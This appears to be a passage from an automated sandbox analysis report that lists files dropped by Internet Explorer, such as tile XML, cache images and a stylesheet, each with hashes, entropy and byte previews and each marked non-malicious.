                                                SSDEEP:96:rEZrQ76lBSAjt2KVWOM+yPdV73RPdV79HA:rEZrQ76lkAjt2eWOM+yVZ3RVZJA
                                                MD5:E3053ACE134DB1A7FECD910F866690F3
                                                SHA1:28DB3A2210973C0C5F18280B972B1D6403F45199
                                                SHA-256:DA4A80B032EC4ACDD13BCD8F0D80ECB14BF4A6827DA383695380E30FA9A41E6A
                                                SHA-512:B4A692F1ACC1C5EB8681DC80DE16B6446A1CF550C73D685618228247B0A683EC658570ADDB5B2C2C283AAC00B77D592D0459899CAED2BB439C87DABF556E479E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FEB7EC9C-1264-11EC-90E5-ECF4BB570DC9}.dat
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:Microsoft Word Document
                                                Category:dropped
                                                Size (bytes):27388
                                                Entropy (8bit):1.8523360764499817
                                                Encrypted:false
                                                SSDEEP:96:rmZ7Qn6ZBSnjx2pWNMTOOxS5CROxS5FxRA:rmZ7Qn6Zknjx2pWNMTOeR5A
                                                MD5:DD8AE832AFB903C9B18E6B1D61AC58E1
                                                SHA1:3B4DD425CD1305666F00FA475E58F2B8BD76B249
                                                SHA-256:4F37F939CEF884820C5C2C55D8103D36AE8F63D5227F6FABA17DE5A4DD6DEC9B
                                                SHA-512:C65B39D71AAF4AD86E8D6888257EBFCC4314B496B4E9C96F796763BBC9C38CB420B4FC2A6A9DD4C42A0C9E64826979587DD0CFFAA57DA7CE13C431037C6DBD46
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):657
                                                Entropy (8bit):5.066571197176442
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxOE40+R0++nWimI002EtM3MHdNMNxOE40+R0++nWimI00ONVbkEtMb:2d6NxOp0+R0++SZHKd6NxOp0+R0++SZa
                                                MD5:DB4B6C993374FAF55CDD37B42729285A
                                                SHA1:DB107DDFA39A62693B5A013A1B402C496CAF4C6F
                                                SHA-256:458F8C41465D1C236C4E851E2F0A6BC5EA4D6429DD9D26C1FD3A94BB03F4497F
                                                SHA-512:194EBAF567AD9B6C9D501428673C8FC5B5AA00FE64E883FEDC5536BCE680F7930B713563029CC9192C6CBD47F84FF0312AEEE1AB38B9FAE57285A553247A6617
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):654
                                                Entropy (8bit):5.075376408075038
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxe2k46VnWimI002EtM3MHdNMNxe2k46VnWimI00ONkak6EtMb:2d6NxrJ6VSZHKd6NxrJ6VSZ72a7b
                                                MD5:7351E15FB910F2518E52F7B5B1518CFB
                                                SHA1:8F1B45B2F7C9341428A2014F2ECD2A7997AA42D7
                                                SHA-256:8013CBF091BDB50F157E6B187E282AEBC9643B7A6B850AA6A2A982FC99908C76
                                                SHA-512:C2238B065D8D9FAFD8A5067BB75F7B8A92E3644398ADC01F5D98D58FE7F85D623D9C140BC281680EDD13F1D9BB81CECCC7BB2DDFD686E13EADCFB05E331C267C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xb2e0c76a,0x01d7a671</date><accdate>0xb2e0c76a,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xb2e0c76a,0x01d7a671</date><accdate>0xb2e0c76a,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):663
                                                Entropy (8bit):5.084691494426712
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxvL40+R0++nWimI002EtM3MHdNMNxvL40+R0++nWimI00ONmZEtMb:2d6NxvM0+R0++SZHKd6NxvM0+R0++SZW
                                                MD5:5DC3C7FE6B57E402304D79EC7DE12A0E
                                                SHA1:AE5E5209C3F853B7CD383414D062A49E840BF285
                                                SHA-256:C1726F48BE061C62984ABDDF9284BF823FCC4036EACE468DD52507FA87DE6B00
                                                SHA-512:7904BC0E82B43D7A3FECA23E680F3B43103AB6CD3A02F7A6FC5E3DB33DB93F759989B6D4D37FB63245B697D5A6404BF6EA3C88DA594232A8587F7E06B5F1502E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):648
                                                Entropy (8bit):5.077114886903433
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxi4cccnnWimI002EtM3MHdNMNxi4cccnnWimI00ONd5EtMb:2d6Nx3tiSZHKd6Nx3tiSZ7njb
                                                MD5:48000DFED5C5704AA67940F3658534B9
                                                SHA1:59AACC7518629450FCEB56DA97CF976AFAD455F8
                                                SHA-256:9BF50996C1C559E32A753613950D1A044F9F7B5F4E9584A7BF666C3F4ECAFD26
                                                SHA-512:BBCD6834716654848F8EFD76CD8DFEBDEF73C77F6A2CA0D3B94D22B92343F3FA13E991C3F0EB1F4BD44644EDEF6607900B6E61801E802FF8151046B28732EB9D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):657
                                                Entropy (8bit):5.094835167959827
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxhGw40+R0++nWimI002EtM3MHdNMNxhGw40+R0++nWimI00ON8K075Ety:2d6NxQl0+R0++SZHKd6NxQl0+R0++SZ0
                                                MD5:3F7E8278DDA631F8B8D3D51787D81E5E
                                                SHA1:D7F1B4B4381BAD2FD5E5140D9B454DFA352E1082
                                                SHA-256:0381A691636E049A93370964A9D3C68BD8E1286BE152F569FA0031F7FB83F68A
                                                SHA-512:53093A6A9932ABD9758D2DE8E3AB7025BDDDDB37EE77AB3604B01E1316826AE11D62521E4A5A7EAB2D33CD245459EB38C4FFDD588A92B2C2C2338136A9D98AC2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):654
                                                Entropy (8bit):5.067645627235869
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNx0n40+R0++nWimI002EtM3MHdNMNx0n40+R0++nWimI00ONxEtMb:2d6Nx040+R0++SZHKd6Nx040+R0++SZR
                                                MD5:8E07D737BB0474328B4E0F2C4FE59A74
                                                SHA1:0D856BFE8DA5AD7EA100A5672DA7551B6F3BF512
                                                SHA-256:75275CA06F3026FB3860595D068D4FA3A0E220139DC55CE05DA121AE9E8F8F70
                                                SHA-512:15C62F8C8C87C1A1E3222A4C4A67C7E06AAB8E0036C66CF1F1AAD9E85B7FDBC6ECBAA4E8D21B6BD06B43BA5CE855FE4DA9F5DE97D60F1CBD34DB4C9A147A99B6
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xb2f177bd,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):657
                                                Entropy (8bit):5.1071082343012435
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxx4cccnnWimI002EtM3MHdNMNxx4cc0++nWimI00ON6Kq5EtMb:2d6NxStiSZHKd6NxSt0++SZ7ub
                                                MD5:6ECC185C7B4C3F5FE422CF895B831264
                                                SHA1:6D11A1348565F4ADCCD1C1ACB23E776A7F5E0FC5
                                                SHA-256:3ACA4D0649C3B591ACFD9DDCC26436FF2A577ADE00EC7F82A1E3666542918A30
                                                SHA-512:3FB3B766FBA2C442A7DC3BE22421952AFB720B9B413DB6325BD7CD4D2B036ED61371E977516CEFF140EC8EA23EE2E552E247F02A741AF57DD862170543B14DD9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2f177bd,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):660
                                                Entropy (8bit):5.077904895885331
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxc4cccnnWimI002EtM3MHdNMNxc4cccnnWimI00ONVEtMb:2d6NxRtiSZHKd6NxRtiSZ71b
                                                MD5:03A01CF8F1ECD75E1FE5490A26D96BA6
                                                SHA1:F7822BC6A2DA24560015A6881CFB553467B6C4D5
                                                SHA-256:FD740BFE75B14A664EB62DF5192CC7C6D9157D67F1EEC262711B90570B15D981
                                                SHA-512:87A1E76D7BCD1A93106464779E57A7CE0EE4FAC8D831FAA0E1708DCD5F76960DAC5CBF2198945E81113BF7C84EC6BBE29E0D31208AD4EB8444C159677C55D74E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):654
                                                Entropy (8bit):5.062686638321148
                                                Encrypted:false
                                                SSDEEP:12:TMHdNMNxfn4cccnnWimI002EtM3MHdNMNxfn4cccnnWimI00ONe5EtMb:2d6NxAtiSZHKd6NxAtiSZ7Ejb
                                                MD5:B78F832D53CDFFFD5776EECE23F1E5BF
                                                SHA1:51FAB597ADF4AC517103B12575A271CAA93321C8
                                                SHA-256:5E372E3142FBC01E3088499FC673AB44FF128BDB8DCBE6335E99375236C04A59
                                                SHA-512:4B1BF57B0A6C3D7804126ED62EE6CC219FB2DED1F093EA263049F8327369B3D939F03E38DB409B4438A5B6EF7FBCCD11601864F76FDC41B0A228AB6ACEE7C998
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xb2ea5015,0x01d7a671</date><accdate>0xb2ea5015,0x01d7a671</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):934
                                                Entropy (8bit):7.0276779480442535
                                                Encrypted:false
                                                SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGl0:u6tWu/6symC+PTCq5TcBUX4bL0
                                                MD5:7E98C7E46D037EE20D5CE6AAA0931B7C
                                                SHA1:BECF6B519EA551C01DA11AA0A3EB416842E87A9B
                                                SHA-256:1CBFDD7FAABF5EA51B85EEC8F5E3CE5084362AD44DE62DC7A64C32EE01603DB6
                                                SHA-512:22CA875C1D50B74B005AB9C49CDE4614A295D845166C5C53800F264E9879EE5CDDBDCAA0225E124A0E40AEFE87C617461FB9DA19EA81BC5F69F2B497483FBF47
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ............;a.....;a....
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\2d-0e97d4-185735b[1].css
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                Category:dropped
                                                Size (bytes):251398
                                                Entropy (8bit):5.2940351809352855
                                                Encrypted:false
                                                SSDEEP:3072:FaPMULTAHEkm8OUdvUvJZkrqq7pjD4tQH:Fa0ULTAHLOUdvwZkrqq7pjD4tQH
                                                MD5:24D71CC2CC17F9E0F7167D724347DBA4
                                                SHA1:4188B4EE11CFDC8EA05E7DA7F475F6A464951E27
                                                SHA-256:4EF29E187222C5E2960E1E265C87AA7DA7268408C3383CC3274D97127F389B22
                                                SHA-512:43CF44624EF76F5B83DE10A2FB1C27608A290BC21BF023A1BFDB77B2EBB4964805C8683F82815045668A3ECCF2F16A4D7948C1C5AC526AC71760F50C82AADE2B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: /*! Error: C:/a/_work/1/s/Statics/WebCore.Statics/Css/Modules/ExternalContentModule/Uplevel/Base/externalContentModule.scss(207,3): run-time error CSS1062: Expected semicolon or closing curly-brace, found '@include.multiLineTruncation' */....@charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .captio
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\87e5c478-82d7-43e3-8254-594bbfda55c7[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                Category:dropped
                                                Size (bytes):65009
                                                Entropy (8bit):7.978070488745874
                                                Encrypted:false
                                                SSDEEP:1536:9FPgE3ptlMp+ZlzOaTc5+vRDXjHyqhLhZa:9FPN37+p+ZHTc0vBjhLO
                                                MD5:7C62F2F02EF85B35216972F6294E279D
                                                SHA1:C4A6E45B4EDC3B8E14B78D78EBA891B20D7B10DD
                                                SHA-256:BC9E5E2000EE4C67C13331AAEF6B085ACC2280A64AA4AD4AFE23FF47F6F527AF
                                                SHA-512:8BB9BE0055FE514818F158B8E037C6B0ADED54F6E81066A955DD85EA2A0D2ECEE01A584A48C8DE46660F789743DBA6D6B0F440AD6BA8AF4D664139910311F8CC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.............C....................................................................C.......................................................................,.,.."...........................................K.........................!...1.."AQa..#2q.....$BR...3..%4Cb..r.T..&7DSds...................................@.....................!...1A.Q."aq2....B...#R....3b...$4Cr.Scs.............?.y.>W..++J..J..}...;...]...@N. kl6......%.....vI)[....H......m.k.?.~.X........v...........i...I....AG..L......w{..h..1.|.....0.#A,.@..a..._...o~'..W../..sH3S..%z....j.@WS2.&r..`@.B.=..q1...0.f.L=......]..~..~..?...ig..\dm`...P.....+M-a!U.X....j...Y..b...J._...Sb..@....'c.2v...d...-2T2...m".D..4..#.{.Y..6./...^-..!.1.2..{.Mw`~.o..Q30.R.o.c........s.K.....y<...nd.6 .....^z.Y-CJ.^C.d.V..h.,;.'.........g>.')..........w%...I!.l....z...Z......EXdR./hu...!.+x......$.A....'.t.\...HS..`.]..7..zo.3.`.[...........'*.X......k.s1./.kD.Xg.r...e.Qv.....y.s..=c....V*.-[..;.....o....\..*.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOfFRV[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                Category:dropped
                                                Size (bytes):2754
                                                Entropy (8bit):7.844425834747859
                                                Encrypted:false
                                                SSDEEP:48:QfAuETA+wjpk5kCLsIZDP21yDvkDHCIY1x3pf7nM4kR1izuW3keUpEpso:Qf7EElWkCLjP21yADHCtx3pfyREj3kUN
                                                MD5:C830ED87471EDAE5A549A8374D0E44AA
                                                SHA1:ECCD1AD8688D25F74D6F9CDDEB938D0316DC5672
                                                SHA-256:D565D9A2812A5FF3057ECD3F8450174294FE18A604B5174B6808CFFFFE49155C
                                                SHA-512:4B72FC23FE713F9BD21E4B8077F99AAAE969749FF4DDA41B1C411E32D9F50C50B2B7141D82D5C305E1C181813FD3FA68E2E54402D3CAA3D9D14269528F97D2FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z4x.n2.s]/S..u[!k6...Ep.g..$sZ....p....k.p.e\.{...<.*$...w....N.{kY....X#|I...E;\..._....r.....Q6.P.Z.Q-.....b.p.b..J ..8..h7..}l.``....Rr..Q...qiqat.s.......{...+.M.9......Z...3..:~.gii%....J...iA.v]E.......o]g.F......}..}...U...k.ft.4z..y.;.g.....q..._Fk..;..y.L.G.LU...............E...X...kQ..aA^Z...q & ...I...r.t....Cw.;...>...zWH9X...A...3...E...Z..X.P.}n.U..q..*.&..2
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOfJsZ[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                Category:dropped
                                                Size (bytes):2490
                                                Entropy (8bit):7.830846007357338
                                                Encrypted:false
                                                SSDEEP:48:QfAuETASNLIt+OSmfUyYuQ8tUnAGtl2hZZL1zG4tTCJ:Qf7EpIyyUyfntUnAOlW1zGIy
                                                MD5:6FA342BB2DAD0272A38CCF9D8B599264
                                                SHA1:65FEE20BEB7A5735412D9759B2E5FA1CAECA27A1
                                                SHA-256:74C1C1A5A96916E147002ECA860D303A57942161D3D7F9F2AAAA6A1CF4EB30E2
                                                SHA-512:2CA505CD6D2B18A510785187B69BED0F3A7050EC15D157AEF187901E1FE149AFFD8A6CF67C1BA628A323CA4252F4D723A4E29D3D5C5BBDF8C06816A78477C39B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.. ..k..7.9_. [. ...0.P....M..'....V..2.. =I...nm../.m.&.SQ0..q.....Y{w}.^...N.5/.,.:.....U...H.U.!..!.D..A.}*[."5D.....Mq.7..k.;....J...f.....8.iV(.....m%v5..A...c..l.nn...W.....\N|.C.....x^.....#.j|.e..2.5....K...V..FV....Z...1..*....9]..Vfi.3.b....&4Fj.=:d1....7fm-Q....7.t.#6..[....s.,.}.O..e..N....d.m..].ls.L}.:.I)3.0..M.>..F.&.b?.A......1...]NjQ....k..{x..}...h...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOfKbP[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                Category:dropped
                                                Size (bytes):9208
                                                Entropy (8bit):7.93658004874926
                                                Encrypted:false
                                                SSDEEP:192:QoZjbcNMrOy2jZoc2apHaejRWSNIHxLf5T0yjPpWYcTxxx9e3rCA:btcC6D12C6SkVr5oylTUxI3rCA
                                                MD5:13E43269EC124CC169F9E7EAE844908C
                                                SHA1:0D953E27B371182B613648BF1BA585E268CA571E
                                                SHA-256:9F6AB9EF0637CBA274ADC44222A53F9D7314E6A73B722F501F2C8ADBF8C34180
                                                SHA-512:AFB631ACD7B3F71CAC612A0ED607CBF17C2B731A5A2C293711AFB29490E7ACE6C3D7EC78393D3225466A62E13B288141243A5F14D0FA0AB78401B1BE0F2C8D3C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..F.....a....s...h...n..6.E... .....>c.....J....n..T.b(.L_...1.....Tc?0..W.B..-)VD*G1....."i....`..-._..t....|... ..>........L...{....S..b5..H'$g>..P...\*H8'.$z....(.a.....fB......?....Y<.Cee\`..O_.+.s>.B.3........p..D....>.....3I.s...|...c?.......d.XX|.3...Q.u..e-nS..s...[.{.z.;".....W..n.......S..z.fG3............y.d.....u.Ii.....).(.P.x.!..e......Wp.......4-.=.G.F{...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAOgC8A[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):12670
                                                Entropy (8bit):7.875186553788666
                                                Encrypted:false
